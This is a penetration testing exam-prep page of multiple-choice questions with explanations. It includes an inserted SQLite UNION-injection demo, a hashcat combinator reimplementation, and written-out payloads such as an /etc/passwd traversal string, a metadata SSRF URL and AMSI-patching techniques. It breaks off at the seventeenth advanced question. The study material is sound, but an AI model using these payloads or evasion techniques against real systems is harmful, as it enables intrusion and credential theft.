Penetration Testing MCQ 60 Tests With Answers (2026)

Penetration testing MCQ practice questions are essential for preparing for competitive exams, certifications (CompTIA PenTest+, CEH, eJPT, OSCP), and technical interviews. This comprehensive MCQ platform provides 60 carefully curated practice questions covering penetration testing methodology, reconnaissance, exploitation, privilege escalation, lateral movement, and pentest reporting.
These questions are organized into three progressive difficulty levels of 20 questions each: Basics (covering foundational terminology, pre-engagement scoping, and passive/active reconnaissance), Concepts (covering vulnerability scanning, Metasploit usage, and core exploitation methodologies), and Advanced (covering scenario-based privilege escalation, lateral movement, Active Directory exploitation, and professional reporting). Each question includes a verified, in-depth explanation to reinforce learning.
Practice in Study Mode to reveal answers and detailed explanations instantly, or use Exam Mode for timed testing and real-time scoring to simulate CompTIA or university exam conditions. The interactive engine tracks your progress and identifies knowledge gaps across scoping, scanning, exploitation, privilege escalation, lateral movement, and report writing.
Contents
- 1. Basics (20 Questions): PTES phases · scoping · active & passive reconnaissance
- 2. Concepts (20 Questions): Vulnerability scanning · Metasploit · web app exploits
- 3. Advanced (20 Questions): Scenario-based · privilege escalation · Active Directory · reporting
- 4. Conclusion: summary · next steps · study tips
- 5. Key Takeaways: quick-fire bullet recap of essential facts
- 6. Quick Review Summary: concept · definition · key fact table
- 7. FAQ: common questions answered
Penetration Testing – Basics
1. What is the primary difference between a vulnerability scan and a penetration test?
Correct answer (C): A vulnerability scan identifies potential flaws, while a penetration test actively exploits them to determine actual business risk and impact.
A vulnerability scan uses automated tools to identify potential weaknesses without verifying exploitability. A penetration test goes further by actively exploiting verified vulnerabilities to demonstrate real-world business risk, impact, and attack paths.
2. In the context of a penetration testing engagement, what is the function of the "Rules of Engagement" (RoE)?
Correct answer (B): The formal document defining the specific timelines, authorized targets, permitted attack types, and communication boundaries of the engagement.
The Rules of Engagement (RoE) is a critical pre-engagement document that establishes the legal and operational boundaries of the test: which systems are in scope, what attack techniques are permitted (for example whether denial-of-service or social engineering is allowed), hours of operation, and emergency escalation contacts.
3. What is the defining characteristic of a "Black Box" penetration test?
Correct answer (D): The tester is given zero prior knowledge of the internal architecture, source code, or credentials of the target environment.
A Black Box test simulates a real external attacker who has no insider knowledge. The tester receives only the company name or a single IP address and must discover everything through reconnaissance, making it the most realistic simulation of an opportunistic external attack. Because everything must be discovered, a Black Box test spends more of a fixed time budget on reconnaissance and may miss flaws that a Gray or White Box test would reach.
4. According to the Penetration Testing Execution Standard (PTES), which phase immediately follows "Pre-engagement Interactions"?
Correct answer (A): Intelligence Gathering (OSINT and Reconnaissance)
The PTES defines seven phases in order: Pre-engagement Interactions → Intelligence Gathering → Threat Modeling → Vulnerability Analysis → Exploitation → Post-Exploitation → Reporting. Intelligence Gathering (OSINT/recon) is the second phase, immediately after scoping.
5. In exploitation frameworks like Metasploit, what is a "Payload"?
Correct answer (C): The piece of code executed on the target system after a vulnerability has been successfully exploited to achieve a specific objective.
In Metasploit, the exploit is the code that triggers the vulnerability, while the payload is the code that runs after a successful exploit to achieve an objective, such as opening a Meterpreter session, adding a user, or executing a command. The same exploit module can be paired with different payloads, which is why Metasploit treats them as separate objects.
6. Which statement accurately describes the difference between an Exploit and a Vulnerability?
Correct answer (A): A vulnerability is a weakness in a system; an exploit is the actual code or methodology used to take advantage of that weakness.
A vulnerability is a flaw or weakness (e.g., an unpatched buffer overflow) inherent in software or configuration. An exploit is the purposeful code, technique, or sequence of actions that leverages that vulnerability to achieve unauthorized access or behavior.
7. How does a "Gray Box" penetration test operate?
Correct answer (D): The tester is provided with partial knowledge of the internal network, often simulating the perspective of a standard, low-level internal employee.
A Gray Box test simulates a partially informed attacker, such as a disgruntled employee, a compromised contractor, or a user with standard credentials. The tester receives some information (e.g., a network map or basic credentials) but not full administrative access.
8. What is the primary purpose of the Nmap utility in a penetration test?
Correct answer (B): Discovering active hosts, open ports, and running services across a target network.
Nmap (Network Mapper) is the industry-standard tool for network discovery and security auditing. It is used to identify live hosts, enumerate open TCP/UDP ports, detect running service versions, and identify the operating system, forming the foundation of network reconnaissance.
9. What does the "Scope" of a penetration test define?
Correct answer (B): The explicit list of IP addresses, domains, and applications that the tester is legally authorized to target.
The scope document is a legally binding agreement specifying exactly which assets (IP ranges, FQDNs, applications, APIs) are approved for testing. Targeting systems outside the defined scope is unauthorized access and potentially illegal, regardless of intent. Assets hosted by third parties (SaaS platforms, cloud tenants, CDNs) may also need the provider's own authorization, so confirm them explicitly during scoping.
10. What does the practice of OSINT (Open-Source Intelligence) entail?
Correct answer (C): Gathering actionable intelligence and reconnaissance about a target using publicly available, legal resources.
OSINT involves collecting intelligence from publicly accessible sources such as WHOIS records, DNS data, LinkedIn profiles, job postings, GitHub repositories and social media, often with search and link-analysis tools such as Shodan and Maltego. It lets testers map an organization's attack surface passively, without sending any traffic to the target's systems.
11. In the context of vulnerability analysis, what is a "False Positive"?
Correct answer (A): An automated scanner reports a vulnerability that does not actually exist or is adequately mitigated by other compensating controls.
A false positive is when a scanner flags something as vulnerable when it is not, either because the flaw doesn't exist, has already been patched, or is blocked by compensating controls like a WAF. Manual verification is essential to separate false positives from true vulnerabilities; its counterpart, the false negative (a real flaw the scanner misses), is the reason scanning alone is not a penetration test.
12. What is the primary goal of the "Post-Exploitation" phase?
Correct answer (D): To determine the true value of the compromised machine, escalate privileges, and establish persistent access.
Post-exploitation focuses on maximizing the impact and value of an already-compromised host: escalating privileges from user to SYSTEM/root, pivoting to adjacent network segments, establishing persistence (backdoors), and exfiltrating sensitive data to demonstrate business impact. Each of these actions must stay within what the RoE permits; real data exfiltration is often replaced by retrieving an agreed marker file.
13. How does a Red Team engagement generally differ from a standard Penetration Test?
Correct answer (A): A penetration test aims to identify as many vulnerabilities as possible, while a Red Team engagement simulates a specific advanced adversary to test the organization's detection and response capabilities.
A penetration test is broad: find as many vulnerabilities as possible. A Red Team engagement is objective-driven: simulate a specific threat actor (e.g., an APT) targeting a specific crown jewel (e.g., financial data) to test whether the Blue Team's detection and response will catch the attack. Red Team operations are typically longer, stealthier, and known only to a small group of defenders.
14. Which of the following is a classic example of "Pretexting" in social engineering?
Correct answer (D): Creating a fabricated, elaborate scenario or persona to manipulate a target into divulging confidential information.
Pretexting involves creating a fabricated scenario (pretext) to establish trust and manipulate a target, e.g., impersonating an IT support technician calling to "verify credentials" or posing as a vendor to gain physical access. It relies on psychological manipulation rather than technical exploits.
15. What occurs during the "Clean-up" phase of a penetration test?
Correct answer (B): Restoring the target systems to their original pre-engagement state by removing backdoors, test accounts, and uploaded binaries.
Clean-up ensures the tester's artifacts do not remain as a secondary attack surface. This includes removing every backdoor, test user account, web shell, uploaded tool, and scheduled task created during the engagement, leaving the environment exactly as found. Keeping a log of every artifact as it is created is what makes complete clean-up possible.
16. What is the functional purpose of a "Reverse Shell"?
Correct answer (C): A payload that forces the compromised target machine to proactively initiate an outbound connection back to the attacker's listening machine.
A reverse shell inverts the connection direction: rather than the attacker connecting inbound to a target (which is typically blocked by firewalls), the compromised target initiates an outbound connection to the attacker's listener. Outbound connections are far less likely to be blocked by perimeter firewalls, although strict egress filtering or a mandatory proxy can still stop them, which is why payloads are often tunnelled over HTTP/HTTPS.
17. What does CVSS stand for in vulnerability management?
Correct answer (B): Common Vulnerability Scoring System
CVSS (Common Vulnerability Scoring System) is an industry-standard framework for rating the severity of security vulnerabilities on a 0–10 scale. It evaluates base metrics (attack vector, complexity, privileges required, user interaction, scope, and confidentiality/integrity/availability impact) to produce a standardized, vendor-neutral severity score. The base score rates the intrinsic severity of the flaw, not the risk to a particular organization; temporal and environmental metrics, and the business context in a pentest report, adjust it.
18. How does a "Bug Bounty" program differ from a traditional penetration test?
Correct answer (A): A Bug Bounty is a continuous, crowdsourced program where independent researchers are financially rewarded for finding and reporting vulnerabilities in specific assets.
Bug Bounty programs (e.g., on HackerOne or Bugcrowd) are ongoing, crowd-sourced initiatives where organizations invite external security researchers to find and responsibly disclose vulnerabilities in exchange for financial rewards. Unlike a time-boxed pentest, they run continuously and pay per valid finding rather than for the tester's time.
19. In payload delivery, what is a "Dropper"?
Correct answer (D): A lightweight, initial piece of malware designed strictly to download and execute the primary, heavier malicious payload from a remote server.
A dropper is a small, often heavily obfuscated executable that serves as the first stage of a multi-stage attack. Its job is to evade initial AV detection, establish a beachhead, then silently deliver and execute the real, heavier payload (such as a RAT or ransomware). Strictly speaking, a dropper carries the next stage inside itself and a downloader fetches it from a C2 server; in practice the two terms are often used interchangeably, as in this question.
20. What is the primary purpose of a Non-Disclosure Agreement (NDA) in a penetration test?
Correct answer (C): To legally ensure that the penetration testers do not publicly disclose or misuse any sensitive data or vulnerabilities discovered during the engagement.
The NDA is a legal instrument that binds the penetration testing firm to strict confidentiality. Testers inevitably access highly sensitive data (credentials, PII, financial records). The NDA ensures this information cannot be disclosed to third parties or used for any purpose outside the engagement.
Penetration Testing – Concepts
1. According to the OWASP Top 10, which scenario best describes a "Broken Access Control" vulnerability?
Correct answer (D): An authenticated user successfully altering a URL parameter (e.g., user_id=5 to user_id=6) to view another user's private account details.
Broken Access Control (OWASP A01) occurs when applications fail to enforce proper authorization. An IDOR (Insecure Direct Object Reference), manipulating user_id=5 to user_id=6 to see another user's data, is the canonical example. The application authenticates the user but doesn't verify they own the requested resource; the fix is a server-side ownership check on every object access, not hiding or randomizing the identifier.
2. How does the Nmap SYN scan (-sS) achieve its stealthier profile compared to a Connect scan (-sT)?
Correct answer (C): It sends a SYN packet, waits for a SYN/ACK, and then sends an RST to tear down the connection before it is fully established, preventing the target application from logging the connection.
The SYN scan (half-open scan) never completes the TCP handshake. It sends SYN, receives SYN/ACK (confirming the port is open), then sends RST to abort, never reaching the application layer. Many application logs only record fully established connections, making SYN scans harder to spot there. "Stealthier" is relative: the SYN packets are still visible to firewalls, IDS sensors and packet captures, and Nmap needs raw-socket privileges (root) for -sS, falling back to -sT when run unprivileged.
3. In Burp Suite, what is the functional difference between the "Intruder" and "Repeater" tools?
Correct answer (A): Intruder is used for automated, customized fuzzing and brute-forcing across multiple requests, while Repeater is used to manually manipulate and resend individual HTTP requests.
Burp Repeater allows manual, iterative request manipulation, ideal for testing a single parameter. Burp Intruder automates payload injection across multiple positions in a request (fuzzing, brute-forcing logins, testing all parameters simultaneously) using customizable payload lists and attack types; note that the Community edition throttles Intruder's request rate.
4. How does a UNION-based SQL Injection attack extract data from a database?
Correct answer (B): It combines the results of the application's original query with the results of an injected malicious query, returning the combined dataset directly into the application's HTTP response.
UNION-based SQLi appends a second SELECT statement to the original query using the UNION operator. The database combines both result sets and returns them in the HTTP response. This requires the injected query to match the number of columns of the original query and, on most databases, compatible data types; attackers discover the column count with ORDER BY n or UNION SELECT NULL,NULL,... probes before extracting data.
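The following example, added for this page and not taken from it, runs a UNION injection against a constructed in-memory SQLite database. The vulnerable search concatenates the user's term into the SQL text; the safe version binds it as a parameter. It also shows the column-count error an attacker would trigger while probing. The table contents and hash strings are made up for the demo.

```python
"""UNION-based SQL injection against a constructed SQLite database
(added example, not from the original page).

The vulnerable search builds SQL by string formatting; the safe version
passes the identical user input as a bound parameter.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed schema: a public products table and a private users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products (name, price) VALUES ('widget', 9.99), ('gadget', 19.99);
        INSERT INTO users (username, password_hash) VALUES
            ('alice', '5f4dcc3b5aa765d61d8327deb882cf99'),
            ('bob',   'e10adc3949ba59abbe56e057f20f883e');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    # User input pasted straight into the SQL text: the injection sink.
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    # Same query, but the term is a bound parameter: the driver never lets it
    # become SQL syntax, so the UNION payload is just an odd search string.
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


# The original query returns two columns, so the injected SELECT must too.
# The trailing -- comments out the rest of the original query (the closing %').
PAYLOAD_OK = "' UNION SELECT username, password_hash FROM users--"
# One column: the database rejects it. That error is how an attacker finds
# the column count (in practice with ORDER BY n or UNION SELECT NULL,NULL,...).
PAYLOAD_WRONG_COLUMNS = "' UNION SELECT username FROM users--"


def demo() -> dict:
    conn = build_db()
    out = {
        "vulnerable": search_vulnerable(conn, PAYLOAD_OK),
        "safe": search_safe(conn, PAYLOAD_OK),
    }
    try:
        search_vulnerable(conn, PAYLOAD_WRONG_COLUMNS)
        out["column_mismatch_error"] = None
    except sqlite3.OperationalError as exc:
        out["column_mismatch_error"] = str(exc)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

SQLite is dynamically typed, so a TEXT hash can sit under the REAL price column; on PostgreSQL or Oracle the injected columns would also have to match types, which is why real payloads start with NULL placeholders and then substitute one column at a time.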
5. What is the fundamental difference between Stored XSS and Reflected XSS?
Correct answer (B): Stored XSS permanently saves the malicious script on the target server (e.g., in a forum post) serving it to future visitors, while Reflected XSS executes immediately and requires the victim to click a specially crafted malicious link.
Stored (Persistent) XSS saves the payload server-side, so every user who views the infected page is attacked without any interaction. Reflected XSS requires tricking a specific victim into opening a crafted URL containing the payload; the server reflects it back in the response and the victim's browser executes it. Stored XSS is usually rated higher because it needs no phishing step and can hit privileged users who view the tainted content.
6. In the Hashcat password cracking utility, how does a "Combinator" attack operate?
Correct answer (C): It appends each word from one wordlist to every word in a second wordlist (e.g., combining "admin" and "password" to test "adminpassword").
Hashcat's Combinator attack (attack mode -a 1) takes two wordlists and generates candidates by appending every word from the right list to every word from the left list, so the keyspace is the product of the two list sizes. This is effective against users who create passwords by concatenating two common words (e.g., 'sunflower' + 'summer' = 'sunflowersummer'); the -j and -k options apply a single rule to the left and right words respectively, for example to capitalise one side or append a symbol.
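To show exactly which candidates the attack produces, and in which order, here is a small Python reimplementation of the combinator mode, added as an example for this page (it is not hashcat's code). The two wordlists and the target hash are constructed; the left_rule/right_rule callables stand in for hashcat's -j/-k single rules and are an illustration, not hashcat's rule syntax.

```python
"""Combinator attack, hashcat attack mode -a 1, reimplemented in Python
(added example; not from the original page and not hashcat's own code).

Every candidate is left_word + right_word. The left wordlist is the outer loop
and the right wordlist the inner loop, which is the order hashcat uses.
The optional left_rule / right_rule callables play the role of hashcat's
-j / -k single rules (an assumption for illustration, not hashcat rule syntax).
"""
import hashlib
from typing import Callable, Iterable, Iterator, List, Optional

# Constructed sample wordlists standing in for the two dictionary files.
LEFT: List[str] = ["admin", "sunflower", "blue"]
RIGHT: List[str] = ["password", "summer", "2024"]

Rule = Optional[Callable[[str], str]]


def combinator(left: Iterable[str], right: Iterable[str],
               left_rule: Rule = None, right_rule: Rule = None) -> Iterator[str]:
    """Yield every left+right candidate in hashcat's order."""
    right_words = [right_rule(w) if right_rule else w for w in right]
    for lw in left:
        lw = left_rule(lw) if left_rule else lw
        for rw in right_words:
            yield lw + rw


def hexdigest(word: str, algo: str = "sha256") -> str:
    """Hash a candidate with any algorithm hashlib knows (e.g. sha256, md5)."""
    return hashlib.new(algo, word.encode()).hexdigest()


def crack(target_hex: str, left: Iterable[str], right: Iterable[str],
          algo: str = "sha256",
          left_rule: Rule = None, right_rule: Rule = None) -> Optional[str]:
    """Return the first candidate whose digest equals target_hex, or None."""
    target = target_hex.lower()
    for candidate in combinator(left, right, left_rule, right_rule):
        if hexdigest(candidate, algo) == target:
            return candidate
    return None


def keyspace(left: Iterable[str], right: Iterable[str]) -> int:
    """Worst-case candidates: |left| * |right| (a plain dictionary tries |left| + |right|)."""
    return len(list(left)) * len(list(right))


if __name__ == "__main__":
    # Constructed target: a user who joined two common words.
    target = hexdigest("sunflowersummer")
    print("first candidates:", list(combinator(LEFT, RIGHT))[:4])
    print("keyspace:", keyspace(LEFT, RIGHT))
    print("recovered:", crack(target, LEFT, RIGHT))
    # Same lists, left word capitalised and "!" appended on the right.
    print("with rules:", crack(hexdigest("Sunflowersummer!"), LEFT, RIGHT,
                               left_rule=str.capitalize,
                               right_rule=lambda w: w + "!"))
```

Unsalted fast hashes are used here only so the example runs in milliseconds; against bcrypt or Argon2 the same keyspace costs orders of magnitude more per candidate, which is the defender's lever.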
7. During an internal penetration test, what is the BloodHound tool primarily used for?
Correct answer (D): To utilize graph theory to visually map complex Active Directory relationships, group delegations, and hidden privilege escalation paths.
BloodHound uses graph theory (nodes and edges) to represent Active Directory objects and their relationships. Paired with the SharpHound collector, it maps attack paths from a low-privilege user account to Domain Admin, revealing delegation misconfigurations, group policy abuse, and hidden privilege chains that are invisible in raw AD data. Collection is noisy (LDAP queries and session enumeration against many hosts), so it is itself a detection opportunity for the Blue Team.
8. What is the core mechanism of a Pass-the-Hash (PtH) attack?
Correct answer (A): Authenticating to a remote Windows system by supplying the valid NTLM hash of a user's password to the authentication protocol, completely bypassing the need to know or crack the actual plaintext password.
Pass-the-Hash exploits the Windows NTLM authentication protocol, whose challenge-response is computed from the NT hash rather than the plaintext password, so the hash itself is sufficient proof of identity. Using tools like Mimikatz or impacket's psexec.py, an attacker can authenticate to remote systems using only the extracted hash. Mitigations include preferring Kerberos, the Protected Users group, Credential Guard, and unique local administrator passwords (LAPS) so one harvested hash does not open every workstation.
9. What is the primary objective when capturing the WPA2 4-way handshake during a wireless penetration test?
Correct answer (C): To capture the cryptographic nonce exchange during a client's connection process, allowing the attacker to attempt to crack the Pre-Shared Key (PSK) offline.
The WPA2 4-way handshake exchanges nonces (ANonce and SNonce) between the AP and client, and the MIC in the handshake is keyed from the PSK. Capturing it allows the attacker to perform offline dictionary/brute-force attacks against the Pre-Shared Key using tools like hashcat (mode 22000) or aircrack-ng, without maintaining a live connection to the network. A client must connect, or be deauthenticated and reconnect, while the tester's card is in monitor mode.
10. What is a significant operational advantage of utilizing the Metasploit Meterpreter payload over a standard command shell?
Correct answer (A): It operates entirely in memory using reflective DLL injection, writing nothing to the physical disk to avoid triggering traditional static antivirus file scans.
Meterpreter is injected into a running process via reflective DLL injection and operates entirely in RAM. Because it never writes to disk as a standalone executable, it evades traditional signature-based AV that scans files. It also provides an encrypted channel and rich post-exploitation modules. The in-memory property applies to the Meterpreter stage itself; the stager or exploit that delivers it may still touch disk, and modern EDR scans process memory and behaviour, so this is not a complete evasion.
11. In Linux privilege escalation, what is the security implication of a binary having the SUID bit set?
Correct answer (B): It allows the executable to run with the permissions of the file's owner (often root), which can be abused to gain a root shell if the binary is poorly configured or vulnerable.
The SUID (Set User ID) bit causes a binary to execute with the permissions of its owner rather than the invoking user. If a root-owned binary with SUID has a vulnerability (e.g., a shell escape, unsafe PATH handling, or a command injection), any user can exploit it to gain a root shell. Listing setuid binaries and comparing them against GTFOBins is a standard step in Linux privilege-escalation enumeration.
12What causes an "Unquoted Service Path" vulnerability in the Windows operating system?
CorrectD: The file path to a service executable contains spaces and lacks enclosing quotation marks, causing the Windows API to mistakenly execute a maliciously placed binary in a parent directory with a matching name.
When a Windows service path like `C:\Program Files\My App\service.exe` lacks quotes, the SCM attempts to execute `C:\Program.exe`, then `C:\Program Files\My.exe`, etc. If an attacker places a binary at any of these intermediate paths with write permissions, they gain SYSTEM execution when the service restarts.
13. What is the execution methodology of a Local File Inclusion (LFI) / Directory Traversal attack?
Correct: A. Manipulating a web application's file path parameter (e.g., using ../../../../etc/passwd) to navigate outside the intended web root and access sensitive local files.
LFI exploits insufficient input validation on file path parameters. By injecting `../../../../etc/passwd` (or null bytes, encoded variations), an attacker traverses outside the web root to read sensitive local files. In severe cases, LFI combined with log poisoning can achieve Remote Code Execution.
14. What is the fundamental mechanism of a Server-Side Request Forgery (SSRF) attack?
Correct: B. Tricking the vulnerable backend server into making HTTP requests to internal or external resources on behalf of the attacker, effectively bypassing external firewalls to access internal services.
SSRF abuses server-side URL fetching functionality. The attacker provides a malicious URL (e.g., http://169.254.169.254/metadata or http://internal-db:5432) causing the server to make requests on the attacker's behalf, bypassing firewalls and exposing internal services that are invisible from the internet.
15. In malware development and evasion, what is the specific role of a "Packer"?
Correct: C. A program that compresses and encrypts an executable payload to alter its on-disk signature and evade static antivirus detection, unpacking itself in memory during execution.
Packers compress and/or encrypt a malicious binary, producing a new executable with a completely different signature. The packed file contains a stub that, at runtime, decompresses/decrypts the original payload in memory and executes it, evading static analysis and AV signature detection while preserving functionality.
16. How does the Sysinternals PsExec utility establish remote command execution for lateral movement?
Correct: D. It uploads a temporary service executable to the hidden ADMIN$ share and interacts with the Service Control Manager (SCM) using SMB to execute it.
PsExec copies a small service binary (PSEXESVC.exe) to the target's ADMIN$ share via SMB, then uses the Service Control Manager (SCM) over the IPC$ pipe to start the service, which executes commands and relays output back to the initiating machine; this requires valid administrative credentials on the target.
17. During internal network enumeration, what does a successful "SMB Null Session" provide to an attacker?
Correct: B. An unauthenticated connection to the IPC$ share that allows the attacker to anonymously enumerate network shares, users, groups, and password policies.
SMB Null Sessions (anonymous logins to IPC$) were a significant issue in legacy Windows (pre-Vista). They allowed unauthenticated enumeration via RPC calls, listing user accounts, group memberships, shares, and password policies with tools such as enum4linux or rpcclient.
18. How does the "Responder" tool typically capture credentials on a Windows network?
Correct: C. It poisons LLMNR, NBT-NS, and mDNS multicast requests, serving fake authentication prompts to capture NTLMv1/v2 hashes from victim machines attempting to connect to mistyped or non-existent network resources.
Responder listens for broadcast name resolution queries (LLMNR, NBT-NS, mDNS) that occur when a Windows host fails DNS resolution. It responds as the requested resource and captures the NTLM authentication hash when the victim automatically attempts to authenticate, requiring no user interaction.
19. What is the fundamental mechanism of a Cross-Site Request Forgery (CSRF) attack?
Correct: D. An attack that forces an authenticated user's browser to execute unwanted, state-changing actions (like transferring funds or changing an email) on a vulnerable web application without their knowledge.
CSRF exploits the browser's automatic inclusion of session cookies in every request. A malicious page on a different origin triggers a request to the victim's authenticated application (e.g., bank transfer). The server sees a valid session cookie and processes the action. The standard mitigations are anti-CSRF tokens and SameSite cookies.
20. In post-exploitation, what is the architectural difference between a Bind Shell and a Reverse Shell?
Correct: A. A bind shell opens a listening port on the compromised target for the attacker to connect to; a reverse shell forces the target to initiate an outbound connection back to the attacker.
A bind shell binds a shell to a port on the target and waits for the attacker to connect inbound, but inbound connections are usually blocked by firewalls. A reverse shell has the target connect outbound to the attacker's listener, which firewalls typically allow because outbound traffic is less restricted.
Penetration Testing: Advanced
1. What is the mechanical process of a "Kerberoasting" attack?
Correct: B. Requesting Kerberos Service Principal Name (SPN) tickets (TGS) for service accounts and extracting them from memory to crack the RC4/AES encrypted ticket offline, revealing the plaintext service account password.
Any domain user can legitimately request a TGS ticket for any SPN-registered service account. The ticket is encrypted with the service account's password hash. Using Impacket's GetUserSPNs.py or Rubeus, testers extract these tickets and crack them offline with Hashcat (mode 13100) to recover the service account's plaintext password.
2. Why is an AS-REP Roasting attack often easier to execute than a standard password spray, provided the target environment is vulnerable?
Correct: A. It specifically targets user accounts that have the "Do not require Kerberos preauthentication" attribute enabled, allowing the attacker to request and crack the AS-REP encrypted message offline without needing initial access credentials.
AS-REP Roasting targets accounts with Kerberos pre-authentication disabled. The KDC responds to unauthenticated AS-REQ packets with an AS-REP containing data encrypted with the user's password hash. This can be retrieved with zero valid credentials (just a username list) and cracked offline using Hashcat mode 18200.
3. During the exploitation of a classic Stack-Based Buffer Overflow, what is the critical role of the EIP (x86) or RIP (x64) register?
Correct: D. It is the Instruction Pointer, which dictates the memory address of the next CPU instruction to be executed, making it the primary target for control-flow hijacking to execute shellcode.
When the stack overflows, the saved return address (which is loaded into EIP/RIP when the function returns) is overwritten. By controlling EIP/RIP to point to the attacker's shellcode (or a ROP gadget), the tester redirects the CPU's execution flow to arbitrary malicious instructions.
4. What is the primary purpose of constructing a Return-Oriented Programming (ROP) chain during exploit development?
Correct: C. Chaining together small, pre-existing snippets of executable machine code ("gadgets") already present in memory to execute arbitrary logic, thereby bypassing Data Execution Prevention (DEP/NX) which blocks execution on the stack.
DEP/NX prevents executing attacker-supplied shellcode on the stack by marking it non-executable. ROP bypasses this by chaining existing 'gadgets' (legitimate code snippets ending in a `ret` instruction) that are already present in executable memory regions such as loaded DLLs, effectively executing arbitrary logic without injecting new code.
5. Which of the following describes a common technique for bypassing the Windows Antimalware Scan Interface (AMSI)?
Correct: A. Patching or hooking the AmsiScanBuffer function in memory to force it to constantly return a "clean" (AMSI_RESULT_CLEAN) result to the calling process, allowing malicious PowerShell or C# to execute unhindered.
AMSI hooks into the PowerShell, .NET, and JScript engines to scan content before execution. The classic bypass patches `AmsiScanBuffer` in the current process's `amsi.dll` to alter its return value to 0 (AMSI_RESULT_CLEAN), making it approve all subsequent content regardless of maliciousness.
6. In the Cobalt Strike Command and Control (C2) framework, what is the function of a "Malleable C2 Profile"?
Correct: B. A configuration script that allows operators to highly customize the network indicators, beacon jitter/timing, and HTTP headers of their payload traffic to mimic legitimate applications and evade IDS/IPS detection.
Malleable C2 Profiles define how Cobalt Strike beacon traffic looks on the wire: HTTP headers, URIs, cookies, jitter timings, and data encoding. Operators can configure beacons to impersonate legitimate traffic (e.g., Microsoft Teams API calls, Google Analytics) to blend into normal traffic and defeat network-based detection.
7. In the context of evading Endpoint Detection and Response (EDR) solutions, what does "Windows API Unhooking" achieve?
Correct: D. Reloading a clean, unadulterated copy of a system DLL (like ntdll.dll) directly from disk into memory to overwrite and bypass the user-land monitoring hooks placed by the EDR agent.
EDRs hook Windows API functions in user-land DLLs (especially ntdll.dll) by patching the function prologue with a JMP to their monitoring code. Unhooking loads a fresh, unmodified copy of the DLL directly from disk (bypassing the hooked version in memory) to restore clean syscall execution that the EDR cannot intercept.
8. What is the underlying mechanism utilized in a DCSync attack?
Correct: C. Using the Directory Replication Service Remote Protocol (MS-DRSR) to impersonate a legitimate Domain Controller, requesting and extracting password hashes (including the KRBTGT hash) from the actual DC.
DCSync (Mimikatz lsadump::dcsync) abuses the MS-DRSR protocol, which Domain Controllers use to replicate data among themselves. An account with Replicating Directory Changes All permission can request password hash replication, allowing extraction of any domain account's hash, including KRBTGT, without touching LSASS.
9. What is the exact distinction between a Golden Ticket and a Silver Ticket in Active Directory exploitation?
Correct: D. A Golden Ticket is a forged TGT encrypted with the KRBTGT hash granting domain-wide access; a Silver Ticket is a forged TGS encrypted with a specific service account hash granting access only to that specific service.
A Golden Ticket forges a TGT using the KRBTGT account hash; since the KDC issues TGTs, forging one grants domain-wide access for up to 10 years. A Silver Ticket forges a TGS for a specific service using that service account's hash, bypassing the KDC entirely but limited to that one service.
10. What is a "DLL Search Order Hijacking" vulnerability?
Correct: C. Placing a malicious DLL in a directory that a vulnerable application searches first, causing the application to unknowingly load the attacker's code instead of the legitimate Windows DLL.
Windows searches for DLLs in a specific order: application directory → current directory → System32 → etc. If an application loads a DLL that is not present in its own directory, and an attacker has write access to that directory, placing a DLL with the matching name there causes the application to load it instead of the legitimate one.
11. What does the "Shadow Credentials" attack vector abuse in Active Directory?
Correct: A. Abusing the msDS-KeyCredentialLink attribute of a computer or user object to associate an attacker-controlled public key, allowing the attacker to request a Kerberos TGT (PKINIT) for that object.
Shadow Credentials (Whisker tool) abuses the msDS-KeyCredentialLink AD attribute used by Windows Hello for Business. With write access to this attribute on a user/computer object, an attacker adds their own public key, then uses PKINIT to authenticate as that object and obtain a TGT without knowing the password.
12. How is a "Process Hollowing" injection technique executed by advanced malware?
Correct: B. Spawning a legitimate process in a suspended state, unmapping (hollowing) its original code from memory, replacing it with malicious shellcode, and resuming the execution thread to disguise the malware.
Process Hollowing (RunPE) creates a legitimate process (e.g., svchost.exe) in a SUSPENDED state, uses NtUnmapViewOfSection to hollow out its memory, writes malicious code in its place, adjusts the entry point, and resumes the thread. Process monitors see a legitimate process name hiding malicious code.
13. In exploit development, what is a "NOP Sled" (No-Operation Sled) used for?
Correct: C. A sequence of "No Operation" (\x90) instructions used to pad a buffer overflow payload, ensuring that even if the jumped return address is slightly inaccurate, the CPU will "slide" down into the actual shellcode.
A NOP sled (`\x90\x90\x90...`) precedes shellcode in a buffer overflow exploit. Because memory addresses shift slightly due to environment variables and stack randomization, the NOP sled acts as a large target: if EIP/RIP lands anywhere within the sled, the CPU executes the NOPs (which do nothing) and slides into the shellcode.
14. What makes an "Insecure Deserialization" vulnerability incredibly dangerous to web applications (e.g., via Ysoserial)?
Correct: D. An attacker manipulates a serialized data object so that when the application natively reconstructs (deserializes) it, it instantiates malicious objects or unexpectedly executes arbitrary code.
Many frameworks (Java, PHP, .NET) execute code during deserialization (gadget chains). Ysoserial generates serialized Java gadget chain payloads. When the application deserializes attacker-supplied data, the crafted object graph triggers method calls culminating in RCE, without any SQL injection or XSS.
15. How can the LD_PRELOAD environment variable be abused for Linux Privilege Escalation?
Correct: A. By setting the variable to force the dynamic linker to load an attacker-controlled shared library before any others, intercepting standard function calls (like geteuid()) when a vulnerable SUID binary is executed.
If a sudo rule allows a user to run a program with LD_PRELOAD preserved (env_keep += LD_PRELOAD), the attacker compiles a malicious shared library (containing a constructor calling setuid(0)/execve()) and sets LD_PRELOAD to its path before invoking the sudo command, causing the linker to load their library first and execute code as root.
16. In penetration testing and cryptographic analysis, what is a "Side-Channel Attack"?
Correct: B. An attack that infers cryptographic keys or secrets by measuring physical implementation artifacts, such as execution time variations, power consumption, or electromagnetic emissions.
Side-channel attacks exploit physical information leakage from a cryptographic implementation rather than mathematical weaknesses in the algorithm itself. Examples include timing attacks (RSA key bits from decryption time variance), power analysis (AES key from CPU power traces), and Spectre/Meltdown (CPU cache timing).
17. In AWS Cloud Pentesting, how is an SSRF vulnerability typically weaponized against an EC2 instance?
